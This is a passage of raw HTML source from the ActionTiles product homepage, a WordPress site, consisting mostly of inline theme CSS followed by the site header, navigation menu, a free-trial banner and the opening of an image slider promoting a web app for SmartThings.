.widget_nav_menu .menu-item a,.wpml-ls-legacy-dropdown a,.wpml-ls-legacy-dropdown-click a,.woocommerce .quantity.buttons_added input.qty,.woocommerce .quantity.buttons_added .plus,.woocommerce .quantity.buttons_added .minus,.woocommerce-tabs .tabs,.woocommerce .related,.woocommerce .upsells,.woocommerce .cross-sells,.woocommerce ul.order_details li,.select2-selection,.smile-icon-timeline-wrap .timeline-line{border-color:#c0c0c0}.w-iconbox.style_default.color_light .w-iconbox-icon,.w-separator,.pagination .page-numbers{color:#c0c0c0}button.w-btn.color_light.style_raised,a.w-btn.color_light.style_raised,.no-touch .color_alternate .w-btn.style_flat:hover,.no-touch .g-loadmore-btn:hover,.color_alternate .g-filters-item .ripple,.color_alternate .w-tabs-item .ripple,.no-touch .color_alternate .owl-prev:hover,.no-touch .color_alternate .owl-next:hover,.no-touch .color_alternate .pagination a.page-numbers:hover,.no-touch .woocommerce #payment .payment_methods li>label:hover,.widget_price_filter .ui-slider:before{background-color:#c0c0c0}h1, h2, h3, h4, h5, h6,.w-counter-number{color:#212121}.w-progbar.color_heading .w-progbar-bar-h{background-color:#212121}.l-canvas,.l-footer,.l-popup-box-content,button.w-btn.color_light.style_raised,a.w-btn.color_light.style_raised,.w-blog.layout_flat .w-blog-post-h,.w-cart-dropdown,.w-iconbox.style_circle.color_light .w-iconbox-icon,.w-pricing-item-h,.w-person.layout_card,.w-tabs.layout_timeline .w-tabs-item,.w-tabs.layout_timeline .w-tabs-section-header-h,.w-testimonials.style_1 .w-testimonial-h,.woocommerce .form-row .chosen-drop,.us-woo-shop_modern .product-h,.select2-dropdown{color:#424242}button.w-btn.color_contrast.style_raised,a.w-btn.color_contrast.style_raised,.w-iconbox.style_circle.color_contrast .w-iconbox-icon,.w-progbar.color_text .w-progbar-bar-h,.w-scroller-dot span{background-color:#424242}.w-scroller-dot span{box-shadow:0 0 0 2px #424242}a{color:#ef6c00}.no-touch a:hover,.no-touch a:hover + .w-blog-post-body .w-blog-post-title a,.no-touch .w-blog-post-title a:hover{color:#e65100}.no-touch .w-cart-dropdown a:not(.button):hover{color:#e65100 !important}.highlight_primary,.g-preloader,button.w-btn.color_primary.style_flat,a.w-btn.color_primary.style_flat,.w-counter.color_primary .w-counter-number,.w-iconbox.style_default.color_primary .w-iconbox-icon,.g-filters-item.active,.w-form-row.focused:before,.w-form-row.focused>i,.no-touch .w-sharing.type_simple.color_primary .w-sharing-item:hover .w-sharing-icon,.w-separator.color_primary,.w-tabs-item.active,.w-tabs-section.active .w-tabs-section-header,.l-main .widget_nav_menu .menu-item.current-menu-item>a,.no-touch .us-woo-shop_modern .product-h a.button,.woocommerce-tabs .tabs li.active,.woocommerce #payment .payment_methods li>input:checked + label,input[type="radio"]:checked + .wpcf7-list-item-label:before,input[type="checkbox"]:checked + .wpcf7-list-item-label:before{color:#ef6c00}.l-section.color_primary,.l-titlebar.color_primary,.no-touch .l-navigation-item:hover .l-navigation-item-arrow,.highlight_primary_bg,.w-actionbox.color_primary,.w-blog-post-preview-icon,button,input[type="submit"],a.w-btn.color_primary.style_raised,.pagination .page-numbers.current,.w-form-row.focused .w-form-row-field-bar:before,.w-form-row.focused .w-form-row-field-bar:after,.w-iconbox.style_circle.color_primary .w-iconbox-icon,.w-pricing.style_1 .type_featured .w-pricing-item-header,.w-pricing.style_2 .type_featured .w-pricing-item-h,.w-progbar.color_primary .w-progbar-bar-h,.w-sharing.type_solid.color_primary .w-sharing-item,.w-sharing.type_fixed.color_primary .w-sharing-item,.w-socials-item-link-hover,.w-tabs-list-bar,.w-tabs.layout_timeline .w-tabs-item.active,.no-touch .w-tabs.layout_timeline .w-tabs-item:hover,.w-tabs.layout_timeline .w-tabs-section.active .w-tabs-section-header-h,.rsDefault .rsThumb.rsNavSelected,.woocommerce .button.alt,.woocommerce .button.checkout,.widget_price_filter .ui-slider-range,.widget_price_filter .ui-slider-handle,.select2-results__option--highlighted,.smile-icon-timeline-wrap .timeline-separator-text .sep-text,.smile-icon-timeline-wrap .timeline-wrapper .timeline-dot,.smile-icon-timeline-wrap .timeline-feature-item .timeline-dot,.l-body .cl-btn{background-color:#ef6c00}.l-content blockquote,.g-filters-item.active,input:focus,textarea:focus,.w-separator.color_primary,.owl-dot.active span,.rsBullet.rsNavSelected span,.woocommerce .quantity.buttons_added input.qty:focus,.validate-required.woocommerce-validated input:focus,.validate-required.woocommerce-invalid input:focus,.us-woo-shop_modern .button.loading:before,.us-woo-shop_modern .button.loading:after,.woocommerce .form-row .chosen-search input[type="text"]:focus,.woocommerce-tabs .tabs li.active{border-color:#ef6c00}input:focus,textarea:focus{box-shadow:0 -1px 0 0 #ef6c00 inset}.highlight_secondary,.no-touch .w-blognav-item:hover .w-blognav-title,button.w-btn.color_secondary.style_flat,a.w-btn.color_secondary.style_flat,.w-counter.color_secondary .w-counter-number,.w-iconbox.style_default.color_secondary .w-iconbox-icon,.w-iconbox.style_default .w-iconbox-link:active .w-iconbox-icon,.no-touch .w-iconbox.style_default .w-iconbox-link:hover .w-iconbox-icon,.w-iconbox-link:active .w-iconbox-title,.no-touch .w-iconbox-link:hover .w-iconbox-title,.no-touch .w-sharing.type_simple.color_secondary .w-sharing-item:hover .w-sharing-icon,.w-separator.color_secondary,.no-touch .woocommerce .stars:hover a,.no-touch .woocommerce .stars a:hover,.woocommerce .star-rating span:before{color:#689f38}.l-section.color_secondary,.l-titlebar.color_secondary,.highlight_secondary_bg,.no-touch .w-blog.layout_tiles .w-blog-post-meta-category a:hover,.no-touch .l-section.preview_trendy .w-blog-post-meta-category a:hover,button.w-btn.color_secondary.style_raised,a.w-btn.color_secondary.style_raised,.w-actionbox.color_secondary,.w-iconbox.style_circle.color_secondary .w-iconbox-icon,.w-progbar.color_secondary .w-progbar-bar-h,.w-sharing.type_solid.color_secondary .w-sharing-item,.w-sharing.type_fixed.color_secondary .w-sharing-item,.no-touch .w-toplink.active:hover,.no-touch .tp-leftarrow.tparrows.custom:hover,.no-touch .tp-rightarrow.tparrows.custom:hover,p.demo_store,.woocommerce .onsale,.woocommerce .form-row .chosen-results li.highlighted{background-color:#689f38}.w-separator.color_secondary{border-color:#689f38}.highlight_faded,button.w-btn.color_light.style_flat,a.w-btn.color_light.style_flat,.l-main .w-author-url,.l-main .w-blog-post-meta>*,.l-main .w-profile-link.for_logout,.l-main .w-socials.color_desaturated .w-socials-item-link,.l-main .g-tags,.l-main .w-testimonial-author-role,.l-main .widget_tag_cloud,.l-main .widget_product_tag_cloud{color:#9e9e9e}.w-btn.style_flat .ripple,.w-btn.color_light.style_raised .ripple,.w-iconbox.style_circle.color_light .ripple,.l-main .w-socials.color_desaturated_inv .w-socials-item-link{background-color:#9e9e9e}.color_footer-top,.color_footer-top .wpcf7-form-control-wrap.type_select:after{background-color:#689f38}.color_footer-top .w-socials-item-link,.color_footer-top .widget_shopping_cart{background-color:#33691e}.color_footer-top,.color_footer-top *,.color_footer-top .w-form-row input:focus,.color_footer-top .w-form-row textarea:focus{border-color:#333333}.color_footer-top .w-separator{color:#333333}.color_footer-top{color:#ffffff}.color_footer-top a{color:#ffffff}.no-touch .color_footer-top a:hover,.no-touch .color_footer-top a:hover + .w-blog-post-body .w-blog-post-title a,.color_footer-top .w-form-row.focused:before,.color_footer-top .w-form-row.focused>i{color:#ffffff}.color_footer-top .w-form-row.focused .w-form-row-field-bar:before,.color_footer-top .w-form-row.focused .w-form-row-field-bar:after{background-color:#ffffff}.color_footer-top input:focus,.color_footer-top textarea:focus{border-color:#ffffff;box-shadow:0 -1px 0 0 #ffffff inset}.color_footer-bottom,.color_footer-bottom .wpcf7-form-control-wrap.type_select:after{background-color:#33691e}.color_footer-bottom .w-socials-item-link,.color_footer-bottom .widget_shopping_cart{background-color:#689f38}.color_footer-bottom,.color_footer-bottom,.color_footer-bottom .w-form-row input:focus,.color_footer-bottom .w-form-row textarea:focus{border-color:#333333}.color_footer-bottom .w-separator{color:#333333}.color_footer-bottom{color:#ffffff}.color_footer-bottom a{color:#ef6c00}.no-touch .color_footer-bottom a:hover,.no-touch .color_footer-bottom a:hover + .w-blog-post-body .w-blog-post-title a,.color_footer-bottom .w-form-row.focused:before,.color_footer-bottom .w-form-row.focused>i{color:#e65100}.color_footer-bottom .w-form-row.focused .w-form-row-field-bar:before,.color_footer-bottom .w-form-row.focused .w-form-row-field-bar:after{background-color:#e65100}.color_footer-bottom input:focus,.color_footer-bottom textarea:focus{border-color:#e65100;box-shadow:0 -1px 0 0 #e65100 inset}</style> <style id='us-header-css' type="text/css">@media (min-width:901px){.hidden_for_default{display:none !important}.l-subheader.at_top{display:none}.l-subheader.at_bottom{display:none}.header_hor .l-subheader.at_top{line-height:30px;height:30px}.header_hor .l-header.sticky .l-subheader.at_top{line-height:20px;height:20px}.header_hor .l-subheader.at_middle{line-height:70px;height:70px}.header_hor .l-header.sticky .l-subheader.at_middle{line-height:50px;height:50px}.header_hor .l-subheader.at_bottom{line-height:50px;height:50px}.header_hor .l-header.sticky .l-subheader.at_bottom{line-height:50px;height:50px}.header_hor .l-header.pos_fixed + .l-titlebar,.header_hor .sidebar_left .l-header.pos_fixed + .l-main,.header_hor .sidebar_right .l-header.pos_fixed + .l-main,.header_hor .sidebar_none .l-header.pos_fixed + .l-main .l-section:first-child,.header_hor .sidebar_none .l-header.pos_fixed + .l-main .l-section-gap:nth-child(2),.header_hor.header_inpos_below .l-header.pos_fixed~.l-main .l-section:nth-child(2),.header_hor .l-header.pos_static.bg_transparent + .l-titlebar,.header_hor .sidebar_left .l-header.pos_static.bg_transparent + .l-main,.header_hor .sidebar_right .l-header.pos_static.bg_transparent + .l-main,.header_hor .sidebar_none .l-header.pos_static.bg_transparent + .l-main .l-section:first-child{padding-top:70px}.header_hor .l-header.pos_static.bg_solid + .l-main .l-section.preview_trendy .w-blog-post-preview{top:-70px}.header_hor.header_inpos_bottom .l-header.pos_fixed~.l-main .l-section:first-child{padding-bottom:70px}.header_hor .l-header.bg_transparent~.l-main .l-section.valign_center:first-child>.l-section-h{top:-35px}.header_hor.header_inpos_bottom .l-header.pos_fixed.bg_transparent~.l-main .l-section.valign_center:first-child>.l-section-h{top:35px}.header_hor .l-header.pos_fixed~.l-main .l-section.height_full:not(:first-child){min-height:calc(100vh - 50px)}.admin-bar.header_hor .l-header.pos_fixed~.l-main .l-section.height_full:not(:first-child){min-height:calc(100vh - 82px)}.header_hor .l-header.pos_fixed~.l-main .l-section.sticky{top:50px}.admin-bar.header_hor .l-header.pos_fixed~.l-main .l-section.sticky{top:82px}.header_hor .sidebar_none .l-header.pos_fixed.sticky + .l-main .l-section.type_sticky:first-child{padding-top:50px}.header_hor.header_inpos_below .l-header.pos_fixed:not(.sticky){position:absolute;top:100%}.header_hor.header_inpos_bottom .l-header.pos_fixed:not(.sticky){position:absolute;bottom:0}.header_inpos_below .l-header.pos_fixed~.l-main .l-section:first-child,.header_inpos_bottom .l-header.pos_fixed~.l-main .l-section:first-child{padding-top:0 !important}.header_hor.header_inpos_below .l-header.pos_fixed~.l-main .l-section.height_full:nth-child(2){min-height:100vh}.admin-bar.header_hor.header_inpos_below .l-header.pos_fixed~.l-main .l-section.height_full:nth-child(2){min-height:calc(100vh - 32px)}.header_inpos_bottom .l-header.pos_fixed:not(.sticky) .w-cart-dropdown,.header_inpos_bottom .l-header.pos_fixed:not(.sticky) .w-nav.type_desktop .w-nav-list.level_2{bottom:100%;transform-origin:0 100%}.header_inpos_bottom .l-header.pos_fixed:not(.sticky) .w-nav.type_mobile.m_layout_dropdown .w-nav-list.level_1{top:auto;bottom:100%;box-shadow:0 -3px 3px rgba(0,0,0,0.1)}.header_inpos_bottom .l-header.pos_fixed:not(.sticky) .w-nav.type_desktop .w-nav-list.level_3,.header_inpos_bottom .l-header.pos_fixed:not(.sticky) .w-nav.type_desktop .w-nav-list.level_4{top:auto;bottom:0;transform-origin:0 100%}}@media (min-width:601px) and (max-width:900px){.hidden_for_tablets{display:none !important}.l-subheader.at_top{display:none}.l-subheader.at_bottom{display:none}.header_hor .l-subheader.at_top{line-height:30px;height:30px}.header_hor .l-header.sticky .l-subheader.at_top{line-height:24px;height:24px}.header_hor .l-subheader.at_middle{line-height:70px;height:70px}.header_hor .l-header.sticky .l-subheader.at_middle{line-height:50px;height:50px}.header_hor .l-subheader.at_bottom{line-height:50px;height:50px}.header_hor .l-header.sticky .l-subheader.at_bottom{line-height:50px;height:50px}.header_hor .l-header.pos_fixed + .l-titlebar,.header_hor .sidebar_left .l-header.pos_fixed + .l-main,.header_hor .sidebar_right .l-header.pos_fixed + .l-main,.header_hor .sidebar_none .l-header.pos_fixed + .l-main .l-section:first-child,.header_hor .sidebar_none .l-header.pos_fixed + .l-main .l-section-gap:nth-child(2),.header_hor .l-header.pos_static.bg_transparent + .l-titlebar,.header_hor .sidebar_left .l-header.pos_static.bg_transparent + .l-main,.header_hor .sidebar_right .l-header.pos_static.bg_transparent + .l-main,.header_hor .sidebar_none .l-header.pos_static.bg_transparent + .l-main .l-section:first-child{padding-top:70px}.header_hor .l-header.pos_static.bg_solid + .l-main .l-section.preview_trendy .w-blog-post-preview{top:-70px}.header_hor .l-header.pos_fixed~.l-main .l-section.sticky{top:50px}.header_hor .sidebar_none .l-header.pos_fixed.sticky + .l-main .l-section.type_sticky:first-child{padding-top:50px}}@media (max-width:600px){.hidden_for_mobiles{display:none !important}.l-subheader.at_top{display:none}.l-subheader.at_bottom{display:none}.header_hor .l-subheader.at_top{line-height:30px;height:30px}.header_hor .l-header.sticky .l-subheader.at_top{line-height:1px;height:1px}.header_hor .l-subheader.at_middle{line-height:50px;height:50px}.header_hor .l-header.sticky .l-subheader.at_middle{line-height:50px;height:50px}.header_hor .l-subheader.at_bottom{line-height:50px;height:50px}.header_hor .l-header.sticky .l-subheader.at_bottom{line-height:50px;height:50px}.header_hor .l-header.pos_fixed + .l-titlebar,.header_hor .sidebar_left .l-header.pos_fixed + .l-main,.header_hor .sidebar_right .l-header.pos_fixed + .l-main,.header_hor .sidebar_none .l-header.pos_fixed + .l-main .l-section:first-child,.header_hor .sidebar_none .l-header.pos_fixed + .l-main .l-section-gap:nth-child(2),.header_hor .l-header.pos_static.bg_transparent + .l-titlebar,.header_hor .sidebar_left .l-header.pos_static.bg_transparent + .l-main,.header_hor .sidebar_right .l-header.pos_static.bg_transparent + .l-main,.header_hor .sidebar_none .l-header.pos_static.bg_transparent + .l-main .l-section:first-child{padding-top:50px}.header_hor .l-header.pos_static.bg_solid + .l-main .l-section.preview_trendy .w-blog-post-preview{top:-50px}.header_hor .l-header.pos_fixed~.l-main .l-section.sticky{top:50px}.header_hor .sidebar_none .l-header.pos_fixed.sticky + .l-main .l-section.type_sticky:first-child{padding-top:50px}}@media (min-width:901px){.ush_image_1{height:64px}.l-header.sticky .ush_image_1{height:48px}}@media (min-width:601px) and (max-width:900px){.ush_image_1{height:48px}.l-header.sticky .ush_image_1{height:32px}}@media (max-width:600px){.ush_image_1{height:32px}.l-header.sticky .ush_image_1{height:24px}}@media (min-width:901px){.ush_image_2{height:64px}.l-header.sticky .ush_image_2{height:48px}}@media (min-width:601px) and (max-width:900px){.ush_image_2{height:48px}.l-header.sticky .ush_image_2{height:32px}}@media (max-width:600px){.ush_image_2{height:32px}.l-header.sticky .ush_image_2{height:32px}}.ush_text_1 .w-text-value{color:}@media (min-width:901px){.ush_text_1{font-size:13px}}@media (min-width:601px) and (max-width:900px){.ush_text_1{font-size:13px}}@media (max-width:600px){.ush_text_1{font-size:13px}}.ush_text_1{white-space:nowrap}.ush_text_2 .w-text-value{color:#424242}@media (min-width:901px){.ush_text_2{font-size:24px}}@media (min-width:601px) and (max-width:900px){.ush_text_2{font-size:24px}}@media (max-width:600px){.ush_text_2{font-size:15px}}.ush_text_2{white-space:nowrap}@media (min-width:901px){.ush_btn_1 .w-btn{font-size:15px}}@media (min-width:601px) and (max-width:900px){.ush_btn_1 .w-btn{font-size:14px}}@media (max-width:600px){.ush_btn_1 .w-btn{font-size:12px}}.l-header .ush_btn_1 .w-btn{background-color:#ef6c00;color:#ffffff}.no-touch .l-header .ush_btn_1 .w-btn:hover{background-color:rgba(104,159,56,0.91);color:#ffffff !important}.header_hor .ush_menu_1.type_desktop .w-nav-list.level_1>.menu-item>a{padding:0 20px}.header_ver .ush_menu_1.type_desktop{line-height:40px}.ush_menu_1.type_desktop .btn.menu-item.level_1>.w-nav-anchor{margin:10px}.ush_menu_1.type_desktop .w-nav-list>.menu-item.level_1{font-size:16px}.ush_menu_1.type_desktop .w-nav-list>.menu-item:not(.level_1){font-size:15px}.ush_menu_1.type_mobile .w-nav-anchor.level_1{font-size:15px}.ush_menu_1.type_mobile .w-nav-anchor:not(.level_1){font-size:14px}@media (min-width:901px){.ush_menu_1 .w-nav-icon{font-size:20px}}@media (min-width:601px) and (max-width:900px){.ush_menu_1 .w-nav-icon{font-size:20px}}@media (max-width:600px){.ush_menu_1 .w-nav-icon{font-size:20px}}@media screen and (max-width:799px){.ush_menu_1 .w-nav-list{display:none}.ush_menu_1 .w-nav-control{display:block}}@media (min-width:901px){.ush_socials_1{font-size:18px}}@media (min-width:601px) and (max-width:900px){.ush_socials_1{font-size:18px}}@media (max-width:600px){.ush_socials_1{font-size:18px}}.ush_socials_1 .custom .w-socials-item-link-hover{background-color:#1abc9c}.ush_socials_1.color_brand .custom .w-socials-item-link{color:#1abc9c}@media (min-width:901px){.ush_btn_1{margin-right:5px!important}}@media (min-width:601px) and (max-width:900px){.ush_btn_1{margin-right:5px!important}}@media (max-width:600px){.ush_btn_1{margin-right:5px!important}}</style> <style id='us-custom-css' type="text/css">div.l-subheader.at_top.width_full{background:#33691e}ul.at_feat_list{list-style:none;list-style-position:outside;margin-left:0}ul.at_feat_list li:before{font-family:'Material Icons';vertical-align:-10%;margin-right:0.9rem;content:'\e86c '}ul.at_feat_list li{margin-bottom:0.3rem;padding-left:2rem;text-indent:-2.5rem;margin-left:1rem;line-height:120%}</style> </head> <body class="home page-template-default page page-id-5377 l-body Zephyr_4.10.2 HB_2.0.6 header_hor header_inpos_top btn_hov_ state_default cookies-not-set woocommerce-no-js us-woo-shop_standard us-woo-cart_compact columns-3 wpb-js-composer js-comp-ver-5.4.7 vc_responsive" itemscope itemtype="https://schema.org/WebPage"> <div class="l-preloader"><div class="l-preloader-spinner"> <div class="g-preloader type_5"><div></div></div> </div></div> <div class="l-canvas sidebar_none type_boxed"> <header class="l-header pos_fixed bg_solid shadow_thin" itemscope itemtype="https://schema.org/WPHeader"><div class="l-subheader at_middle width_full"><div class="l-subheader-h"><div class="l-subheader-cell at_left"><div class="w-img ush_image_2"><a class="w-img-h" href="https://www.ActionTiles.com"><img class="for_default" src="https://i2.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/atweb_orange-grey-whbg-blname-64.png?fit=203%2C64&#038;ssl=1" width="203" height="64" alt="" /></a></div></div><div class="l-subheader-cell at_center"></div><div class="l-subheader-cell at_right"><nav class="w-nav type_desktop dropdown_mdesign m_align_left m_layout_dropdown ush_menu_1" itemscope itemtype="https://schema.org/SiteNavigationElement"><a class="w-nav-control" href="javascript:void(0);" aria-label="Menu"><div class="w-nav-icon"><i></i></div><span>Menu</span></a><ul class="w-nav-list level_1 hide_for_mobiles"><li id="menu-item-10623" class="menu-item menu-item-type-post_type menu-item-object-product w-nav-item level_1 menu-item-10623"><a class="w-nav-anchor level_1" href="https://www.actiontiles.com/shop/location-license"><span class="w-nav-title">Buy Now</span><span class="w-nav-arrow"></span></a></li> <li id="menu-item-5804" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children w-nav-item level_1 menu-item-5804"><a class="w-nav-anchor level_1" href="#"><span class="w-nav-title">News</span><span class="w-nav-arrow"></span></a> <ul class="w-nav-list level_2"> <li id="menu-item-5805" class="menu-item menu-item-type-post_type menu-item-object-page w-nav-item level_2 menu-item-5805"><a class="w-nav-anchor level_2" href="https://www.actiontiles.com/news/compliments"><span class="w-nav-title">Compliments &#038; Reviews</span><span class="w-nav-arrow"></span></a></li> <li id="menu-item-5528" class="menu-item menu-item-type-post_type menu-item-object-page w-nav-item level_2 menu-item-5528"><a class="w-nav-anchor level_2" href="https://www.actiontiles.com/news/blog"><span class="w-nav-title">News Posts</span><span class="w-nav-arrow"></span></a></li> </ul> </li> <li id="menu-item-5534" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children w-nav-item level_1 menu-item-5534"><a class="w-nav-anchor level_1" href="https://www.actiontiles.com/help"><span class="w-nav-title">Help</span><span class="w-nav-arrow"></span></a> <ul class="w-nav-list level_2"> <li id="menu-item-5536" class="menu-item menu-item-type-custom menu-item-object-custom w-nav-item level_2 menu-item-5536"><a class="w-nav-anchor level_2" target="_blank" href="http://support.actiontiles.com/forums/8-actiontiles-knowledge-base/"><span class="w-nav-title">Knowledge Base &#038; FAQ</span><span class="w-nav-arrow"></span></a></li> <li id="menu-item-5766" class="menu-item menu-item-type-custom menu-item-object-custom w-nav-item level_2 menu-item-5766"><a class="w-nav-anchor level_2" target="_blank" href="http://support.actiontiles.com/forums/12-actiontiles-forum/"><span class="w-nav-title">Support &#038; Ideas Forum</span><span class="w-nav-arrow"></span></a></li> <li id="menu-item-5557" class="menu-item menu-item-type-post_type menu-item-object-page w-nav-item level_2 menu-item-5557"><a class="w-nav-anchor level_2" href="https://www.actiontiles.com/terms"><span class="w-nav-title">Terms of Service</span><span class="w-nav-arrow"></span></a></li> <li id="menu-item-5807" class="menu-item menu-item-type-post_type menu-item-object-page w-nav-item level_2 menu-item-5807"><a class="w-nav-anchor level_2" href="https://www.actiontiles.com/privacy"><span class="w-nav-title">Privacy Policy</span><span class="w-nav-arrow"></span></a></li> <li id="menu-item-5808" class="menu-item menu-item-type-post_type menu-item-object-page w-nav-item level_2 menu-item-5808"><a class="w-nav-anchor level_2" href="https://www.actiontiles.com/cookies"><span class="w-nav-title">Cookies</span><span class="w-nav-arrow"></span></a></li> </ul> </li> <div class="w-nav-close"></div></ul><div class="w-nav-options hidden" onclick='return {&quot;mobileWidth&quot;:800,&quot;mobileBehavior&quot;:0}'></div></nav><div class="w-btn-wrapper ush_btn_1"><a class="w-btn style_solid color_custom icon_atright" href="https://www.actiontiles.com/app_login_button"><i class="fa fa-sign-in"></i><span class="w-btn-label">App Login</span></a></div></div></div></div><div class="l-subheader for_hidden hidden"><div class="w-html hidden_for_default ush_html_1">&nbsp;</div></div></header> <div class="l-main"> <div class="l-main-h i-cf"> <main class="l-content" itemprop="mainContentOfPage"> <section class="l-section wpb_row height_auto"><div class="l-section-h i-cf"><div class="g-cols vc_row type_default valign_top"><div class="vc_col-sm-12 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="vc_empty_space" style="height: 1px" ><span class="vc_empty_space_inner"></span></div> </div></div></div></div></div></section><section class="l-section wpb_row height_auto" id="pre-header-message" style="padding-top: 6px !important;padding-bottom: 6px !important;"><div class="l-section-h i-cf"><div class="g-cols vc_row type_default valign_top"><div class="vc_col-sm-12 wpb_column vc_column_container"><div class="vc_column-inner color_custom" style="color:#ffffff;"><div class="wpb_wrapper"> <div class="wpb_text_column "> <div class="wpb_wrapper"> <p style="text-align: center;"><a style="color: #eeeeee;" href="https://www.actiontiles.com/app_register_banner"><span style="text-decoration: underline;">Click to dive into the App and start your <em>free </em>14‑Day trial!</span></a></p> </div> </div> </div></div></div></div></div></section><!-- Row Backgrounds --><div class="upb_color" data-bg-override="0" data-bg-color="#33691e" data-fadeout="" data-fadeout-percentage="30" data-parallax-content="" data-parallax-content-sense="30" data-row-effect-mobile-disable="true" data-img-parallax-mobile-disable="true" data-rtl="false" data-custom-vc-row="" data-vc="5.4.7" data-is_old_vc="" data-theme-support="" data-overlay="false" data-overlay-color="" data-overlay-pattern="" data-overlay-pattern-opacity="" data-overlay-pattern-size="" ></div><section class="l-section wpb_row height_auto width_full color_custom" style="background-color: #212121;"><div class="l-section-h i-cf"><div class="g-cols vc_row type_default valign_top"><div class="vc_col-sm-12 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="wpb_revslider_element wpb_content_element"><link href="https://fonts.googleapis.com/css?family=Open+Sans:700%7CRoboto:700%2C500" rel="stylesheet" property="stylesheet" type="text/css" media="all"> <div id="rev_slider_1_1_wrapper" class="rev_slider_wrapper fullwidthbanner-container" data-source="gallery" style="margin:0px auto;background:#4e5256;padding:0px;margin-top:0px;margin-bottom:0px;"> <!-- START REVOLUTION SLIDER 5.4.8 auto mode --> <div id="rev_slider_1_1" class="rev_slider fullwidthabanner" style="display:none;" data-version="5.4.8"> <ul> <!-- SLIDE --> <li data-index="rs-14" data-transition="fadethroughdark" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="500" data-thumb="https://i1.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/stage4_1100x600_Q70-1.jpg?fit=1100%2C600&ssl=1" data-delay="16000" data-rotate="0" data-saveperformance="off" data-title="Wall Perspective" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <!-- MAIN IMAGE --> <img src="https://i2.wp.com/www.actiontiles.com/wp-content/plugins/revslider/admin/assets/images/dummy.png?resize=1100%2C600&#038;ssl=1" alt="" title="stage4_1100x600_Q70" width="1100" height="600" data-lazyload="https://i1.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/stage4_1100x600_Q70-1.jpg?fit=1100%2C600&ssl=1" data-bgposition="center center" data-bgfit="cover" data-bgrepeat="no-repeat" data-bgparallax="off" class="rev-slidebg" data-no-retina data-recalc-dims="1"> <!-- LAYERS --> <!-- LAYER NR. 1 --> <div class="tp-caption tp-resizeme" id="slide-14-layer-7" data-x="-1" data-y="43" data-width="['434']" data-height="['32']" data-type="text" data-responsive_offset="on" data-frames='[{"delay":1000,"speed":1000,"frame":"0","from":"opacity:0;","to":"o:1;skY:7px;","ease":"Power3.easeInOut"},{"delay":"+5800","speed":900,"frame":"999","to":"opacity:0;","ease":"Power2.easeIn"}]' data-textAlign="['center','center','center','center']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 5; min-width: 434px; max-width: 434px; max-width: 32px; max-width: 32px; white-space: normal; font-size: 31px; line-height: 30px; font-weight: 700; color: rgba(0,0,0,1); letter-spacing: ;font-family:Open Sans;">The maker of <a href="http://www.SmartTiles.click" target="_blank" style="font-size: 31px; text-decoration: underline; color: black;"SmartTiles>SmartTiles</a> </div> <!-- LAYER NR. 2 --> <div class="tp-caption tp-resizeme" id="slide-14-layer-17" data-x="" data-y="83" data-width="['434']" data-height="['32']" data-type="text" data-responsive_offset="on" data-frames='[{"delay":2230,"speed":1000,"frame":"0","from":"opacity:0;","to":"o:1;skY:7px;","ease":"Power3.easeInOut"},{"delay":"+4770","speed":900,"frame":"999","to":"opacity:0;","ease":"Power2.easeIn"}]' data-textAlign="['center','center','center','center']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 6; min-width: 434px; max-width: 434px; max-width: 32px; max-width: 32px; white-space: normal; font-size: 27px; line-height: 30px; font-weight: 700; color: rgba(0,0,0,1); letter-spacing: ;font-family:Open Sans;">(the web app for SmartThings) </div> <!-- LAYER NR. 3 --> <div class="tp-caption tp-resizeme" id="slide-14-layer-11" data-x="1" data-y="121" data-width="['427']" data-height="['32']" data-type="text" data-responsive_offset="on" data-frames='[{"delay":3500,"speed":1000,"frame":"0","from":"opacity:0;","to":"o:1;skY:7px;","ease":"Power3.easeInOut"},{"delay":"+3700","speed":900,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['center','center','center','center']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 7; min-width: 427px; max-width: 427px; max-width: 32px; max-width: 32px; white-space: normal; font-size: 31px; line-height: 30px; font-weight: 700; color: rgba(0,0,0,1); letter-spacing: ;font-family:Open Sans;">is proud to present... </div> <!-- LAYER NR. 4 --> <div class="tp-caption tp-resizeme" id="slide-14-layer-13" data-x="-6" data-y="363" data-width="['413']" data-height="['auto']" data-visibility="['off','off','off','off']" data-type="text" data-responsive_offset="on" data-frames='[{"delay":2700,"speed":1000,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"+7290","speed":0,"frame":"999","ease":"Power3.easeInOut"}]' data-textAlign="['right','right','right','right']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 8; min-width: 413px; max-width: 413px; white-space: normal; font-size: 25px; line-height: 30px; font-weight: 700; color: rgba(0,0,0,1); letter-spacing: ;font-family:Open Sans;">An easier and more powerful web app for SmartThings™! </div> <!-- LAYER NR. 5 --> <div class="tp-caption tp-shape tp-shapewrapper tp-resizeme" id="slide-14-layer-6" data-x="right" data-hoffset="-46" data-y="-1" data-width="['710']" data-height="['572']" data-type="shape" data-responsive_offset="on" data-frames='[{"delay":8800,"speed":5490,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 